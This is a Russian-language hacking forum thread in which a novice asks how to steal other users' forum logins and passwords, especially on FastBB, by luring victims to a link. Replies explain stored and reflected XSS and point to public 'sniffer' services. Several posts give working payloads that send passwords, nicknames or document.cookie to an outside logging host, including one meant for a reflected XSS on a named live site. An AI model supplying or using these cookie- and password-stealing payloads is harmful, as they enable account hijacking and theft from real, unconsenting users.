Пацаны, ну во-первых всем привет, а во-вторых... мож кто не полениться и объяснит мне принцип работы сниффера в сети и как им правильно пользоваться. И еще, а это правда, что есть такие снифферы, что если я помещу ссылку на него в форуме, а жертва по ней зайдет, то я могу получить ее пасс и логин ( мне говорили что это только на FastBB ато там пароли храняться в открытом виде )??? Мож кто научит, просветит?!
Привет, пацан Принцип работы: http://ru.wikipedia.org/wiki/Sniffer Как правильно пользоваться: анализировать сетевой траффик. Правду ли тебе сказали: Да, правду. Читай тут http://old.antichat.ru/sniff/
Ну во первых ты выкладываешь не открытую ссылку на снифер а скрытую её в xss. Если XSS активная то любому пользователю достаточно просто прочитать сообщение чтобы хэш пришол на снифер. На снифер приходят все паоли от любых форумов самое главное составить правильно XSS большинство на снифер приходят пароли в зашифрованом виде типа md5 который потом можно расшифровать получив пароль из него.
Я не умею пользоваться XSS, я вообще не знаю Java Script, мне нужно что б жертва просто прошла по ссылке, я ее туда просто заманю. Я хотел истользовать активную XSS, но у меня не вышло почему-то. Она видна другим пользователям. Я вот такое отправил: [font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:document.images[1].src="http://s.netsec.ru//s.gif?id=79&"+pass+nick); ]][/font] но видимо не судьба етому свершиться, да еще и сниффер на s.netsec.ru почему-то у меня не открываеться, все время мне 404 выбивает. Так что мож кто исходники даст на такой сниффер или даст ссылку где можна такую фишку зарегить?
Вот тебе на, бронированный форум. Ну неужели ничего не можна сделать. Так давайте все по порядку. Пароли на FastBB храняться в открытом виде, это все знают, мне не нужна активная XSS мне и пассивной было бы вполне достаточно. Пожалуйста, мужики, подскажите где можна захомутать сниффера??? Век буду признателен!
Спасибо конечно что откликнулся, я этот сниффер видел уже, но легкомысленность ламерской души не имеет предела. Дело в том, что я не умею им пользоваться. Допустим я сделал сниффер с логином bla-bla. Тогда адрес сниффера будет выглядеть вот так http://antichat.org/s/bla-bla/log.php. Но я не пойму, какую ссылку мне жертве показывать надобно, а по какой самому заходить? Может кто не матернеться мышленно, да потратить на мою маленькую персону минуту времени???
По этой ссылке у тебя будут отчеты снифера! А ссылка на снифер вот так http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
тебе надо заходить на http://antichat.org/s/bla-bla/log.php, а жертве http://antichat.org/s/bla-blaю.gif, нотак ты увидишь только его IP а что б стірить кукисі читай темі про XSS
Pashahak Сразу на фастбб лезть - это жестоко =) Потренировался бы на более уязвимых... Дело то вот в чем - за счет своей системы бесплытнх форумов фастбб имеет очень нифиговую посещаемость. Ессно, рекламодатели туда ломануться, дабы куча народу заценила их фирму или что тама у них... Ну и ессно фастбб дерет нефиговые бабки с рекламодателей... Текстовая ссылка везде - 50 ВМЗ в НЕДЕЛЮ... Поэтому они будут беречь своих юзеров... Короче, если тебе сейчас скажут уявимость таких форумов, то, скороей всего, ее залатают в ближайшие 24 часа =) А найти там багу уже ой как не просто...
Что-то я не понимаю, при чем та ссылка именно к моему снифферу зарегеному, и как вообще инфо отправиться на мой сниффер bla-bla если в ней нету и намека на него?
Тьху мля как дела плохи, действительно, нус, что ж, мож кто прямую ссылочку на XSS для фастББ даст тупому ламеру?
Пацаны, а допустим есть XSS http://www.neora.ru/anketa/index.php?latter="><script>alert()</script> как ее перекрутить чтоб кукисы украсть с помощью высше описанного сниффера ( тут мне ничего не нужно, я только принцип узнать хочу ) Заранее спасибо.
По теории вместо alert() ставишь img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document.cookie;
